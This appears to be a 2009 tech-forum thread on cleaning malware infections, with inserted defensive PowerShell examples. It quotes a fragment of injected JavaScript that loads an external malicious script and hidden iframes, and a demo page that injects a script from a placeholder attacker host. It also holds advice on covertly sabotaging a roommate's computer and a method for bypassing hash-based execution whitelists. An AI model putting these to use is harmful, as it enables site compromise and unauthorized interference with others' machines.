 
Midelne
Jun 19, 2002

I shouldn't trust the phones. They're full of gas.

Midelne posted:

SANS post on something very similar today, at least with regards to .exe hijacking. Looks like another major pain in the rear end to clean no matter how you slice it.

I actually got to play around with this bugger (Windows Police Pro) the other day. It's an incredible pain if you're taking the route that the contributor of the article took, but appears to be the only modern malware that does not infect System Restore points. You can go in, delete the program files and a suspicious-looking temp file directory that has randomly-named files and unicows.dll hanging out somewhere on your computer, then start a system restore.

The system restore doesn't kill the original infection vector, but it takes care of the damage to file associations that WPP caused and gives you the chance to avoid reimaging the machine or losing data. MalwareBytes finds and eliminates it fine once it can actually run.

Infection vector in this case, judging by user's browsing history, was one of three absolutely legitimate sites that I would never expect to be compromised (American military website, ADP.com, or Bing.com are the only sites accessed on that machine, Bing being used to locate the military website). Most likely an invisible frame in the website, pulled content from lovsexx.ru. Do not go to lovsexx.ru.


fishmech
Jul 16, 2006

by VideoGames
Salad Prong

thelightguy posted:

Not saying I doubt you or anything, but there are so many inconsistencies between BIOSes that it would be impossible to write something that would target more than a relatively small number of systems, since you'd need a different binary image for each motherboard. The Amiga, because of its more standardized architecture, had so-called restart-proof viruses, which were more or less BIOS level, but not the PC.

The ones I remember seeing tended to target various popular gamer motherboards. It's surprising how popular certain boards would be, but the PC BIOS virus/wiper thing seems to have died off these days, probably because by 2002 or so a lot of motherboard producers that sold primarily to people building stuff themselves started putting anti-BIOS-virus stuff in their systems. I have a couple of no-name boxes from 2002 or so that a gamer friend of mine gave to me that have "BIOS VIRUS GUARD", which basically locks down the flashing ability on every boot, so the only way to flash it is to reboot while holding certain keys down.

PerfectlyAnonymous
Nov 20, 2008
I'm really confused. My facebook just sent a message to 1 person:

"hey I'm making crazy money online! take a look at MyBizOffer.com to see how you can start too! JoN"

I changed the password immediately. Anybody know what this could be?

I only use that password for Facebook, fortunately.

Stanley Pain
Jun 16, 2001

by Fluffdaddy

PerfectlyAnonymous posted:

I'm really confused. My facebook just sent a message to 1 person:

"hey I'm making crazy money online! take a look at MyBizOffer.com to see how you can start too! JoN"

I changed the password immediately. Anybody know what this could be?

I only use that password for Facebook, fortunately.

KMFT, Koobface? Stop clicking every video link you see ;)

anticake
Nov 5, 2004

Biscuit Hider
I just got a kind of weird one. I resumed a Firefox session that had a hojillion tabs, so I'm not entirely certain which one set this off, but the Firefox window was either a centered picture of a warning popup, or Firefox popups don't get their own item in the taskbar or something, because I get this message about how my computer needs to be scanned for viruses. Okay, I'll just Alt-F4, because I'm not clicking anything on a window that may or may not be there. So when I Alt-F4, it apparently captured that, closed the 'pop-up', but then maximized my Firefox window and made a fake My Computer crossed with some kind of fake virus-scanning page. Alt-F4ing this page killed Firefox, and when I opened up a fresh session it seems to be acting normal again. Scanned with MBAM, SAS, and Nod32 and apparently nothing happened. I was unaware programs could capture Alt-F4 to do something other than close the window. Is this normally possible, or do I have something that's not being picked up making it possible?

KomradeVirtunov
Sep 14, 2007
I had a malicious Super/UltraAntiSpyware 2010 ad come up on two tabs on SomethingAwful today. They try pretty hard with the XP explorer background image, it doesn't work as well as imagined when the user is using Windows Vista/7 though.

It's been a while since I've encountered any significant viruses on our several hundred machines at work, apparently Symantec Endpoint Protection isn't that bad of a product (that or it's disabling the protection).

Hipster_Doofus
Dec 20, 2003

Lovin' every minute of it.

KomradeVirtunov posted:

I had a malicious Super/UltraAntiSpyware 2010 ad come up on two tabs on SomethingAwful today. They try pretty hard with the XP explorer background image, it doesn't work as well as imagined when the user is using Windows Vista/7 though.

Yeah I got the same thing here this afternoon. I reported it.

Green Puddin
Mar 30, 2008

Hipster_Doofus posted:

Yeah I got the same thing here this afternoon. I reported it.

I can't on my end, I was surfing SA but just minutes ago I installed a printer with some drivers so I wasn't sure if it was a website or the stuff I just installed.

PUBLIC TOILET
Jun 13, 2009

I have a user's laptop here; she complained of no longer being able to access SSL websites and other various issues. She said she was renewing her subscription to McAfee and the next thing she knew, she couldn't sign into AOL anymore, open McAfee or sign into Verizon Central. I pretty much assumed an infection of some kind, so I started off by going through Add/Remove Programs, msconfig, etc. I had to run the McAfee removal utility before ComboFix would even run properly. Eventually ComboFix deleted a KB913800.exe file in C:\WINDOWS\system32 and also deleted an entry in C:\RECOVER (even after I had initially turned off System Restore). Anyone heard of this infection? There are various reports online about it but nothing definitive. I'm doing some additional scans on it right now.

thehandtruck
Mar 5, 2006

the thing about the jews is,
OK guys pretty sure I'll be flamed to death for it but I'm requesting some rather...odd, help. If it's not kosher just let me know and I'll edit the post.

Practical jokes between my roommate and me have escalated to the point of sabotage and subterfuge. Yesterday he sent an email from my own computer to my laptop tricking me into driving an hour out of the city for a job interview that I didn't have. The day before, he used the house FTP/fileserver (hosted on my comp) to change my alarm setting (also on my comp) so I'd wake up bright and early on Saturday, my one day to sleep in. Clearly it's time to retaliate.

I'm looking for a virus or worm or whatever it's called that will shut down the computer abruptly the second the computer hits April Fools (1st). Now he's moving across the country in a few days so it needs to be something I can implant and send him on his way. Either that or a virus that will slowly but surely open the doors for other virii until the computer is either unusable or has accumulated a rather large amount of horse porn. Shock and embarrassment value are key here. The target computer is just his media/music center so there's nothing important on it.

Ensign Expendable
Nov 11, 2008

Lager beer is proof that god loves us
Pillbug
I think that violates the spirit of this thread. There are features built into Windows that will activate a shutdown at a specific time, but they usually give at least 30 seconds warning.

Otacon
Aug 13, 2002


Just install Limewire on the computer. The viruses will begin to accumulate from there.

thehandtruck
Mar 5, 2006

the thing about the jews is,

Otacon posted:

Just install Limewire on the computer. The viruses will begin to accumulate from there.

Nah, we're not as computer savvy as most of the people in SHSC, but even to us that's a red flag.

FCKGW
May 21, 2006

thehandtruck posted:

Nah, we're not as computer savvy as most of the people in SHSC, but even to us that's a red flag.

rjlsoftware.com/software/entertainment/ has a few "prank" programs, things like giving fake BSODs and putting the screen into powersave mode every 60 seconds.
BLAH: Careful on that link, may have iframe hijackers injected into the site.

FCKGW fucked around with this message at 15:54 on Sep 17, 2009

thehandtruck
Mar 5, 2006

the thing about the jews is,

BorderPatrol posted:

This site has a few "prank" programs, things like giving fake BSODs and putting the screen into powersave mode every 60 seconds.

Perfect! Not doing any actual damage was 2nd priority but if I can avoid it great. Thanks.

edit: is there any way I can delay the program for a certain amount of time? Like the Y2K one, to not start until April 1st?

thehandtruck fucked around with this message at 05:23 on Sep 17, 2009

Elected by Dogs
Apr 20, 2006

BorderPatrol posted:

This site has a few "prank" programs, things like giving fake BSODs and putting the screen into powersave mode every 60 seconds.

This web site at https://www.rjlsoftware.com has been reported as an attack site and has been blocked based on your security preferences.

<script type="text/javascript" src=http://avse2.cn>

var ff=new ActiveXObject(flash);}
catch(b){};
finally{if(b!="[object Error]"){document.write("<iframe width=111 height=111 src=f.html></iframe>");}}


Jesus christ this thing has like 300 .js iframes in iframes all obfuscated

FCKGW
May 21, 2006

Elected by Dogs posted:

This web site at https://www.rjlsoftware.com has been reported as an attack site and has been blocked based on your security preferences.

<script type="text/javascript" src=http://avse2.cn>

var ff=new ActiveXObject(flash);}
catch(b){};
finally{if(b!="[object Error]"){document.write("<iframe width=111 height=111 src=f.html></iframe>");}}


Jesus christ this thing has like 300 .js iframes in iframes all obfuscated

Hmm, I got that message but I looked through the source code and didn't see anything odd. I figured it was because the programs themselves are usually trapped up in antivirus programs.

Google search for avse2.cn doesn't turn up too good.

Welp, tread lightly then. New website to test your antivirus software I guess :eng99:

Midelne
Jun 19, 2002

I shouldn't trust the phones. They're full of gas.

thehandtruck posted:

Nah, we're not as computer savvy as most of the people in SHSC, but even to us that's a red flag.

If you think he's unlikely to check his scheduled tasks, use the at and shutdown commands to schedule forced shutdowns at any time and date you desire.

Elected by Dogs
Apr 20, 2006

BorderPatrol posted:

Hmm, I got that message but I looked through the source code and didn't see anything odd. I figured it was because the programs themselves are usually trapped up in antivirus programs.

Google search for avse2.cn doesn't turn up too good.

Welp, tread lightly then. New website to test your antivirus software I guess :eng99:

It's at the bottom right below the Google Analytics code before </body>
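The two posts above locate the injection by eye (an external script dropped in just before </body>, after the analytics snippet). Below is an added example, not code from the thread or from the site involved, of a PowerShell scan that finds script or iframe tags pointing at hosts outside an allow-list in every page under a web root. The sample page it scans is constructed here for the demo, the attacker host `attacker.invalid` is a placeholder, and the allow-list (`www.google-analytics.com` only) is an assumption you would adjust for your own site.

```powershell
# Added example (not from the thread): scan a web root for <script>/<iframe>
# tags whose src points at a host outside an allow-list, which is how the
# injected snippet described above shows up in a page's HTML.

function Find-InjectedTags {
    param(
        [Parameter(Mandatory)] [string] $Path,
        # Hosts the site legitimately loads scripts from (assumed allow-list).
        [string[]] $AllowedHosts = @('www.google-analytics.com')
    )
    # Match src= with or without quotes; the injected tag in this thread
    # had an unquoted src.
    $pattern = '<(script|iframe)\b[^>]*\bsrc\s*=\s*["'']?(?<src>[^"''\s>]+)'
    Get-ChildItem -Path $Path -Recurse -Include *.html,*.htm,*.php |
      ForEach-Object {
        $file = $_
        $text = Get-Content -Path $file.FullName -Raw
        foreach ($m in [regex]::Matches($text, $pattern, 'IgnoreCase')) {
            $src = $m.Groups['src'].Value
            # Only absolute URLs to other hosts are interesting here;
            # relative paths like f.html are loaded from the site itself.
            if ($src -notmatch '^(https?:)?//') { continue }
            $uri = [uri]($src -replace '^//', 'http://')
            if ($AllowedHosts -contains $uri.Host) { continue }
            # Line number helps: injected code usually sits right before
            # </body> or after the last legitimate script block.
            $line = ($text.Substring(0, $m.Index) -split "`n").Count
            [pscustomobject]@{
                File = $file.FullName
                Line = $line
                Tag  = $m.Groups[1].Value
                Host = $uri.Host
                Src  = $src
            }
        }
      }
}

# Constructed sample page: a legitimate analytics include followed by an
# injected external script just before </body>. attacker.invalid is a
# placeholder host, not the one named in the thread.
$demoDir = Join-Path $env:TEMP 'injected-demo'
New-Item -ItemType Directory -Force -Path $demoDir | Out-Null
@'
<html><body>
<h1>Prank software</h1>
<script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
<script type="text/javascript" src=http://attacker.invalid/x.js></script>
</body></html>
'@ | Set-Content -Path (Join-Path $demoDir 'index.html')

# Expected: one hit, Tag=script, Host=attacker.invalid, on the line before </body>.
Find-InjectedTags -Path $demoDir | Format-Table -AutoSize
```

As the later post in the thread notes, a compromised server may only serve the injected tag some of the time, so a scan of the files on disk is not the same as fetching the page; run this against the actual document root and, if it comes up clean, check the served HTML and the server-side code (includes, templates, .htaccess) as well.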

Pwnz0r
Sep 21, 2005
Having once been the controller of a major botnet in my younger days before being arrested, now I am faced with dealing with my own bullshit. A rootkit that is hard as gently caress to manually remove. I have tried almost everything; scanning it as an external won't work either. May just end up formatting it if it's worth more than the hassle of manually fixing it.

tdsserv was easy to remove, but bluefuzion took a bit more work; it took less time than I expected.

Pwnz0r fucked around with this message at 01:44 on Sep 24, 2009

Midelne
Jun 19, 2002

I shouldn't trust the phones. They're full of gas.

Pwnz0r posted:

Having once been the controller of a major botnet in my younger days before being arrested, now I am faced with dealing with my own bullshit. A rootkit that is hard as gently caress to manually remove. I have tried almost everything; scanning it as an external won't work either. May just end up formatting it if it's worth more than the hassle of manually fixing it.

I don't know how it works for home use, but in an enterprise environment if you are even in doubt about being rooted it is my understanding that you format the sucker and install from known-good. I don't know that I would even bother attempting to remove a rootkit on my home machine unless it somehow interfered with me saying "Brb, formatting and reinstalling Windows" on AIM.

URL grey tea
Jun 1, 2004

IT'S A SAD THING THAT YOUR ADVENTURES HAVE ENDED HERE!!
Ran into a new variant of XP Police that linked the default .exe class extension to a helper .dll that would check to see if the process you are launching is on an internal whitelist. If you were trying to open something that wasn't on the list, it would auto-close the program and report it supposedly "infected", cascade with pop-ups to buy protection, etc.

Easily fixed by renaming taskmgr.exe to explorer.exe and closing the processes responsible, renaming the .dll, then fixing HKEY_CLASSES_ROOT\exefile\shell\open\command, but gently caress do they keep getting more persistent. This is almost impossible to walk someone through over the phone.
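The registry fix in the post above is the part that is hard to dictate over the phone. The following is an added PowerShell example, not the poster's own commands, that reports the current .exe handler under both HKCR and the per-user HKCU\Software\Classes override (a FakeAV favourite because it needs no admin rights) and can put the stock values back. The stock values assumed here are the Windows defaults: `.exe` maps to the `exefile` class and its open command is `"%1" %*`. Run it from an elevated prompt after the hijacking processes are already dead, as the post describes; the hijack DLL itself still has to be renamed or removed separately.

```powershell
# Added example (not from the thread): inspect and restore the .exe
# file-association handler hijacked by the FakeAV variant described above.
# Assumed stock values: HKCR\.exe -> 'exefile', open command '"%1" %*'.

$expectedCmd = '"%1" %*'
$exeCmdKeys = @(
    'Registry::HKEY_CLASSES_ROOT\exefile\shell\open\command',
    # HKCU\Software\Classes overrides HKCR for the current user, so a hijack
    # planted here works without administrative rights.
    'Registry::HKEY_CURRENT_USER\Software\Classes\exefile\shell\open\command'
)
$exeExtKeys = @(
    'Registry::HKEY_CLASSES_ROOT\.exe',
    'Registry::HKEY_CURRENT_USER\Software\Classes\.exe'
)

function Get-DefaultValue([string]$Key) {
    if (-not (Test-Path $Key)) { return $null }
    (Get-ItemProperty -Path $Key -Name '(default)' -ErrorAction SilentlyContinue).'(default)'
}

function Test-ExeAssociation {
    # Report what the handler currently is and whether it differs from stock.
    foreach ($key in $exeCmdKeys) {
        if (-not (Test-Path $key)) { continue }
        $cmd = Get-DefaultValue $key
        [pscustomobject]@{ Key = $key; Value = $cmd; Hijacked = ($cmd -ne $expectedCmd) }
    }
    # A '.exe' class that maps to something other than 'exefile' (a fresh
    # class name pointing at the helper DLL) is the other common hijack.
    foreach ($key in $exeExtKeys) {
        if (-not (Test-Path $key)) { continue }
        $progid = Get-DefaultValue $key
        [pscustomobject]@{ Key = $key; Value = $progid; Hijacked = ($progid -ne 'exefile') }
    }
}

function Repair-ExeAssociation {
    # Drop any per-user override entirely, then reset the machine-wide values.
    Remove-Item -Path 'Registry::HKEY_CURRENT_USER\Software\Classes\.exe' -Recurse -ErrorAction SilentlyContinue
    Remove-Item -Path 'Registry::HKEY_CURRENT_USER\Software\Classes\exefile' -Recurse -ErrorAction SilentlyContinue
    Set-ItemProperty -Path 'Registry::HKEY_CLASSES_ROOT\.exe' -Name '(default)' -Value 'exefile'
    Set-ItemProperty -Path 'Registry::HKEY_CLASSES_ROOT\exefile\shell\open\command' -Name '(default)' -Value $expectedCmd
}

# Show the current state; call Repair-ExeAssociation once you have read it
# and noted the path of the DLL the hijacked command points at.
Test-ExeAssociation | Format-Table -AutoSize
```

Look at the Value column before repairing: the hijacked command names the helper DLL (typically via rundll32), which tells you what to rename or delete next. If PowerShell itself will not launch because the hijack blocks it, the same renaming trick the post uses for taskmgr.exe applies.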

Luigi Thirty
Apr 30, 2006

Emergency confection port.

This afternoon my brother used my computer to print out something for his school. As soon as he plugged in his USB stick it was like giving my computer the clap via autorun. I thought I had autorun turned off, but it was set to only disable CD-ROM autoplay :sigh:

I immediately started getting those "YOUR COMPUTER IS INFECTED!!!" popups. Checked with GMER and yep, I ended up with some horrible rootkit (UAC.Fake) that SuperAntiSpyware and MalwareBytes could see but not remove. It also injected itself into every running executable at the time. Thankfully it didn't modify any of them, it just masqueraded as a device driver and injected itself into every running program so you couldn't take it down. It also didn't help that the rootkit would crash them and delete the executable halfway through the scan.

I was afraid to use a USB stick on this computer so I ended up setting up a Samba share between my Gentoo computer and the PC. I figured out that if you kill explorer.exe, firefox.exe, and iexplore.exe on bootup the virus goes dead. Downloaded ComboFix on the Gentoo computer, (the rootkit ate the one I had, of course), copied it to the PC and ran it. An hour later, my computer worked again.

What would I do without you ComboFix :allears:

TheElectronicOne
Oct 17, 2007
Are you the fullfiller?

Elected by Dogs posted:

It's at the bottom right below the Google Analytics code before </body>

Sometimes rooted HTTP servers only show the iframe on random occasions. This happened to me when my website was on GOONY GOON host WoolNet and their admins refused to believe the server was compromised because they "didn't see it".

Capnbigboobies
Dec 2, 2004

Luigi Thirty posted:

What would I do without you ComboFix :allears:

Yeah, Combofix in safe mode is now pretty much the first thing I run on an infected machine. If it does not clear it out so I can run an antivirus scan, I just format, because in the end it's faster.

Otacon
Aug 13, 2002


Combofix has saved my rear end so many times at the office that I finally donated some money by paypal to combofix@live.com. I figure with the money I've made using it, I might as well. Karma++, right?

Luigi Thirty
Apr 30, 2006

Emergency confection port.

It never ends. My mom was browsing Facebook in IE and clicked on one of those "YOU HAVE TO SEE THIS!!!! https://www.virus.com" links. She said she didn't open anything, but IE says that an SSL certificate is invalid when she tries to click on the Facebook settings page, making me think it was a drive-by SSL certificate exploit or something. IE, of course, won't tell me which certificate is the invalid one. GMER came up clean. Her solution was to go in via Firefox and change her password, because Firefox didn't prompt her saying the certificate was invalid. I'm afraid of a man-in-the-middle attack that hijacks her account, but I don't know much about IE SSL exploits.

How do I figure out which SSL certificate is invalid? Delete them all?

hobb
Sep 20, 2001
MS Security Essentials is out for everyone apparently. I was thinking of switching to it from Avast!, but does anyone who's used it know if it's comparable or uses less resources? I'm wary to change, largely because Avast does some 'meta' things that I haven't seen from a lot of other AV/malware I've used, like triggering a secure desktop any time you/something else tries to uninstall it.

Otacon
Aug 13, 2002


hobb posted:

MS Security Essentials is out for everyone apparently. I was thinking of switching to it from Avast!, but does anyone who's used it know if it's comparable or uses less resources? I'm wary to change, largely because Avast does some 'meta' things that I haven't seen from a lot of other AV/malware I've used, like triggering a secure desktop any time you/something else tries to uninstall it.

I've had it since beta, and have installed it on many friends' and family members' computers. No complaints. It is better suited for a home market, however; Avast (I feel) is more geared towards a power user, and many of my older family members find it confusing, despite the tape-deck controls.

MSE is wonderful for anyone - especially if their existing anti-virus choice has a habit of staying unsubscribed for months or years at a time - OR, if you're running one of those near-worthless free versions of McAfee you get with high-speed companies.

Capnbigboobies
Dec 2, 2004
MSE is a pretty nice AV and I think is a nice replacement for Avast, AVG and Antivir. I feel that Antivir offers the best protection, but when there is a version update, the way to disable avnotify.exe often stops working on xp home machines. So the computers I installed it on for friends will have that drat pop-up come back up!

Screw it, I just put MSE on those machines. I like how it's nice and quiet; it never bugs the user unless something is wrong. Some people have bitched about how one of the processes can use 50 MB of RAM, but jesus christ, spend 15 bucks and get 512+ more RAM then! Is anybody else tired of people bitching about modern apps that use more than 8 MB of RAM?

Stanley Pain
Jun 16, 2001

by Fluffdaddy

Capnbigboobies posted:

Is anybody else tired of people bitching about modern apps that use more than 8 MB of RAM?

Yes. :)

Frabba
May 30, 2008

Investing in chewy toy futures
My aunt's laptop which she lets her kids use got infected with Vundo recently. It was particularly annoying, since the PC would freeze before a scan of any kind could complete, including running vundofix in safe mode. Ended up just formatting the fucker. drat kids.

Midelne
Jun 19, 2002

I shouldn't trust the phones. They're full of gas.

frabba posted:

drat kids.

Install Vista / 7, turn UAC up, and make sure the kids have Standard User accounts that have absolutely no administrative privileges. Then teach your aunt how to pick a good password and instruct her that she should absolutely never give her children the password or allow them to watch her type it in. If necessary, configure Parental Controls.

No more viruses, or at least very very few of them that do more than sit in that single user's profile and cause popups.

FCKGW
May 21, 2006

Virut strikes again!

Engadget posted:

This isn't the first time we've heard of an institutional virus outbreak -- even the crew of the International Space Station had a neat little scare not too long ago -- and now various outlets in Australia are reporting that Integral Energy, which supplies energy to homes and businesses in New South Wales and Queensland, has suffered a particularly nasty visit by the W32.Virut.CF virus. When all was said and done, the company had to repair all 1000 of the facility's desktops. Furthermore, the Sydney Morning Herald reports that the company's anti-virus software hadn't been updated since at least February. Between the lack of anti-virus updates and the fact that segregation between the company's main network and the grid was "typically none at all", this story has all the makings of a disaster. Luckily, the grid itself runs on Sun Solaris -- and when control systems became infected, how did they fix the mess? That's right: by replacing them with Linux machines.

At least they had the sensibility to just replace the infected machines.

Slow-Scan Shep
Jul 11, 2001

Is Virut still pretty dangerous, or have most AV scanners gotten better at detecting it?

Slow-Scan Shep fucked around with this message at 07:23 on Oct 10, 2009

EMILY BLUNTS
Jan 1, 2005

Here's how good trojans/viruses work:

Update your code and install base faster than antivirus companies can.

So yes, it's dangerous AND they're better at detecting it AND it's getting better at not getting detected. :)

PUBLIC TOILET
Jun 13, 2009

BorderPatrol posted:

Virut strikes again!


At least they had the sensibility to just replace the infected machines.

An IT administrator was probably nagging them to buy this and buy that. After this happened, the admin probably told them the only way to prevent this from happening again is to switch to Linux. Not that it's a bad thing I just think it's funny.

Midelne
Jun 19, 2002

I shouldn't trust the phones. They're full of gas.
Microsoft Malware Blog does Windows Police Pro

Not much in-depth analysis there, though it does give good visuals, and it has a link to the much more detailed Windows Police Pro / W32/FakeScanti entry in their malware encyclopedia. Good read.

edit: Bonus image for the chutzpah of whoever coded this.

URL grey tea
Jun 1, 2004

IT'S A SAD THING THAT YOUR ADVENTURES HAVE ENDED HERE!!

The Pro posted:

You should also only allow authorized programs with hash checking.
http://www.google.com/search?&q=blocking+domain+users+from+executing+programs

Software Restriction Policies and Hash rules via Group Policy are very easily defeated. Open executable in hex editor, go to the end of the file, smash keyboard, save executable. Now I can play Solitaire in peace, you fuckers.

Whitelisting all known, good, desired software and denying anything else is the way to go in a business environment, but good luck with that. I can barely get IT admins to stop sharing out the entire C:\ drive on 1,000 workstations with Read/Write permissions or turning off any useful security feature the minute it becomes more than 5 seconds of additional work, or causes a slight performance increase. MY MEGAHURTZZZ.

The security problem right now isn't with anti-virus: it's with the people managing it. Every single virus outbreak scenario I walk into, there is something absolutely boneheaded configured somewhere, 100%, guaranteed. What's up, exclude remote files turned on. Why? Better performance! My users complained! Well, are the users complaining now that their machines are blissfully running autorun.inf from their network drives and infecting them with Virut or Conficker, spreading to any USB key they plug in, so they can take it home with them too? loving idiots.

Eight step guide to nearly perfect security in Windows:

1) Install the KB patch and disable Autoruns via Group Policy.
2) AV and Anti-spam scanning at the gateway.
3) AV and Anti-spam scanning at the Exchange store / SMTP server.
4) Disable the ability to send any archive or executable attachments via e-mail.
5) Whitelist known applications, block all others (HIPS or similar systems).
6) Least privileged access for all service accounts and network shares, if possible. Ask vendors for documentation on this.
7) Use a regular user account for day to day activity, RunAs your administrator account only on a CLEAN and TRUSTED machine, and only to perform quick tasks.
8) USB keys / iPods / iPhones are banned from being plugged into company equipment. Kill anyone who violates this, get software to enforce it if needed.
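Several items on the list above come down to a handful of registry values and share settings that are easy to check and, as the post says, routinely found misconfigured. The following is an added PowerShell audit, not part of the post, covering steps 1, 6 and 7: AutoRun disabled on every drive type (NoDriveTypeAutoRun = 0xFF plus the HonorAutoRunSetting = 1 value that the KB967715 update introduced so that Windows actually honours it), no drive roots shared out beyond the hidden administrative shares, the current session not running as an administrator, and UAC (EnableLUA) turned on. It only reports; it changes nothing. Step 5 (application whitelisting) and the mail-gateway items are not something a local script can verify and are left out.

```powershell
# Added example (not from the post): read-only audit of a workstation for
# the AutoRun, share and least-privilege items in the list above. Registry
# locations are the documented policy keys; the share check uses WMI so it
# also works on older hosts.

function Get-RegValue([string]$Path, [string]$Name) {
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($item) { $item.$Name } else { $null }
}

function Test-Hardening {
    $explorerPol = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer'
    $systemPol   = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $results = @()

    # Step 1: AutoRun. 0xFF disables it on every drive type; HonorAutoRunSetting=1
    # is the KB967715 value that makes Windows obey NoDriveTypeAutoRun reliably.
    $noDrive = Get-RegValue $explorerPol 'NoDriveTypeAutoRun'
    $honor   = Get-RegValue $explorerPol 'HonorAutoRunSetting'
    $results += [pscustomobject]@{
        Check = 'AutoRun disabled on all drive types'
        Pass  = ($noDrive -eq 0xFF -and $honor -eq 1)
        Value = "NoDriveTypeAutoRun=$noDrive HonorAutoRunSetting=$honor"
    }

    # Step 6: shares. Names ending in $ (C$, ADMIN$, IPC$) are the hidden
    # administrative shares; a visible share whose path is a drive root is
    # the "entire C:\ drive shared out" case the post complains about.
    $rootShares = Get-WmiObject -Class Win32_Share | Where-Object {
        $_.Name -notmatch '\$$' -and $_.Path -match '^[A-Za-z]:\\?$'
    }
    $results += [pscustomobject]@{
        Check = 'No drive roots shared out'
        Pass  = (-not $rootShares)
        Value = (($rootShares | ForEach-Object { "$($_.Name)=$($_.Path)" }) -join '; ')
    }

    # Step 7: the day-to-day session should not hold the Administrators role,
    # and UAC should be on so that elevation is an explicit RunAs/prompt.
    $id      = [Security.Principal.WindowsIdentity]::GetCurrent()
    $isAdmin = (New-Object Security.Principal.WindowsPrincipal $id).IsInRole(
                   [Security.Principal.WindowsBuiltInRole]::Administrator)
    $results += [pscustomobject]@{
        Check = 'Current session is not an administrator'
        Pass  = (-not $isAdmin)
        Value = $id.Name
    }
    $lua = Get-RegValue $systemPol 'EnableLUA'
    $results += [pscustomobject]@{
        Check = 'UAC (EnableLUA) enabled'
        Pass  = ($lua -eq 1)
        Value = "EnableLUA=$lua"
    }
    $results
}

Test-Hardening | Format-Table -AutoSize
```

Anything reporting Pass = False is one of the "boneheaded" settings the post describes. The AutoRun values are normally set through Group Policy (Computer Configuration > Administrative Templates > Windows Components > AutoPlay Policies), which is the right place to fix them across a domain rather than per machine.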

URL grey tea fucked around with this message at 12:51 on Oct 17, 2009


URL grey tea
Jun 1, 2004

IT'S A SAD THING THAT YOUR ADVENTURES HAVE ENDED HERE!!
Also, I had an interesting case at work today where a new variant of Scribble (you guys call it Virut here) had infected a bunch of other malware on 9 or so computers in this guy's network. The call was started by the fact the AV software was failing to clean these up, for seemingly no reason, and was throwing suspicious packer detections as well.

After the customer sent us some of the files for testing, we found it was a new variant of Virut. Barf.

Cleanup was (amusingly) failing on the other malware because they had been infected by the new virut routine, changing the file contents / positions, which broke cleanup.

To remove those, we had to disinfect everything via a bootable CD scan, which removed the virut infections, and then had to re-run the scan again to remove the original malware that Virut had hosed with. Double virus. :)

URL grey tea fucked around with this message at 12:55 on Oct 17, 2009
